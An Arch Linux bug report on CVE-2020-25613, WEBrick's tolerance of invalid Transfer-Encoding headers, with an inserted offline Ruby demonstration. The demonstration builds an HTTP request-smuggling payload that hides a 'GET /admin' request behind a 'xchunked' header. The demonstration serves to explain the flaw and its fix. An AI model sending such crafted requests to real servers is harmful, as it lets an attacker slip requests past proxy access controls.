FS#68051 - [security][ruby][ruby2.6] CVE-2020-25613

Attached to Project: Arch Linux
Opened by loqs (loqs) - Tuesday, 29 September 2020, 23:36 GMT
Last edited by Antonio Rojas (arojas) - Sunday, 19 June 2022, 09:33 GMT
Task Type Bug Report
Category Security
Status Closed
Assigned To Levente Polyak (anthraxx)
Architecture All
Severity High
Priority Normal
Reported Version
Due in Version Undecided
Due Date Undecided
Percent Complete 100%
Votes 0
Private No

Details

Description:
WEBrick was too tolerant against an invalid Transfer-Encoding header. This may lead to inconsistent interpretation between WEBrick and some HTTP proxy servers, which may allow the attacker to “smuggle” a request.
Affected versions
webrick gem 1.6.0 or prior
bundled versions of webrick in ruby 2.7.1 or prior
bundled versions of webrick in ruby 2.6.6 or prior
bundled versions of webrick in ruby 2.5.8 or prior
Additional info:
* ruby 2.7.1-3
* ruby2.6 2.6.6-1
* https://www.ruby-lang.org/en/news/2020/09/29/http-request-smuggling-cve-2020-25613/
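The inconsistency the advisory describes, shown as an added example that is not part of this bug report and is not WEBrick's own code. It assumes (my reading of the linked commit; the diff itself is not on this page) that the lenient check was a substring match for "chunked" in the Transfer-Encoding value and that the fix anchors the match to the whole value, and it models a hypothetical front-end proxy that ignores a Transfer-Encoding value it does not recognise and delimits the body by Content-Length instead. The request bytes are constructed for the example.

```ruby
require 'stringio'

# Raised where a WEBrick-style parser would answer 501 Not Implemented.
class UnsupportedTransferEncoding < StandardError; end

# Read one request line plus header block; nil at end of stream.
def read_head(io)
  request_line = io.gets or return nil
  headers = {}
  while (line = io.gets) && line != "\r\n"
    name, value = line.split(':', 2)
    headers[name.strip.downcase] = value.to_s.strip
  end
  [request_line.strip, headers]
end

# Decode a chunked body (no trailers handled; enough for the demonstration).
def read_chunked(io)
  body = +''
  loop do
    size = io.gets.to_s.strip.to_i(16)
    break if size.zero?
    body << io.read(size)
    io.gets            # CRLF that terminates the chunk data
  end
  io.gets              # blank line after the last chunk
  body
end

# How each party decides whether the Transfer-Encoding value means "chunked".
def chunked?(te, mode)
  case mode
  when :lenient then te.match?(/chunked/i)      # assumed pre-fix WEBrick: substring match
  when :strict  then te.match?(/\Achunked\z/i)  # assumed fixed WEBrick: whole-value match
  when :proxy   then te.casecmp?('chunked')     # hypothetical front-end: exact token only
  end
end

def read_body(io, headers, mode)
  te = headers['transfer-encoding']
  if te
    return read_chunked(io) if chunked?(te, mode)
    # WEBrick rejects any other value with 501; the hypothetical proxy instead
    # ignores the header and falls back to Content-Length. That is the mismatch.
    raise UnsupportedTransferEncoding, "Transfer-Encoding: #{te}" unless mode == :proxy
  end
  cl = headers['content-length']
  cl ? io.read(Integer(cl)) : ''
end

# Split a raw byte stream into the [request_line, body] pairs a parser in
# the given mode sees. Returns an Array; raises where WEBrick would 501.
def split_requests(raw, mode)
  io = StringIO.new(raw)
  requests = []
  while (head = read_head(io))
    line, headers = head
    requests << [line, read_body(io, headers, mode)]
  end
  requests
end

# Constructed traffic. LEGIT is an ordinary chunked POST; ATTACK carries an
# invalid Transfer-Encoding value ("xchunked") and a Content-Length that
# covers an empty chunked body followed by a second, smuggled request.
LEGIT = "POST / HTTP/1.1\r\nHost: victim.example\r\n" \
        "Transfer-Encoding: chunked\r\n\r\n5\r\nhello\r\n0\r\n\r\n"

SMUGGLED = "GET /admin HTTP/1.1\r\nHost: victim.example\r\n\r\n"
BODY     = "0\r\n\r\n" + SMUGGLED
ATTACK   = "POST / HTTP/1.1\r\nHost: victim.example\r\n" \
           "Content-Length: #{BODY.bytesize}\r\n" \
           "Transfer-Encoding: xchunked\r\n\r\n" + BODY

if __FILE__ == $0
  %i[proxy lenient strict].each do |mode|
    begin
      seen = split_requests(ATTACK, mode).map(&:first)
      puts "#{mode.to_s.ljust(7)} sees #{seen.size} request(s): #{seen.inspect}"
    rescue UnsupportedTransferEncoding => e
      puts "#{mode.to_s.ljust(7)} rejects the request with 501 (#{e.message})"
    end
  end
end
```

Run as a script: the proxy sees one POST whose body happens to contain `GET /admin`, the lenient back-end sees that POST followed by a separate `GET /admin` that the proxy never inspected, and the strict back-end refuses the request outright, which is the behaviour the fix restores. The legitimate chunked request parses identically in all three modes.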
This task depends upon

Closed by Antonio Rojas (arojas)
Sunday, 19 June 2022, 09:33 GMT
Reason for closing:  Fixed
Comment by loqs (loqs) - Wednesday, 30 September 2020, 22:00 GMT
Fix on the 2.7 branch [1]. It applies cleanly to 2.7.1 and 2.6.6.

[1] https://git.ruby-lang.org/ruby.git/commit/?id=828c34e58b63d64558ec0f2d1d7ae401c5e6b21f
Comment by Anatol Pomozov (anatolik) - Wednesday, 30 September 2020, 22:14 GMT
ruby2.7 has been patched in ruby-2.7.1-4

Leaving patching 2.6 to Sergei who added ruby26 to the repo.
Comment by Anatol Pomozov (anatolik) - Wednesday, 30 September 2020, 22:15 GMT
This task cannot be assigned to Sergei, so I added him on the "Notification" page.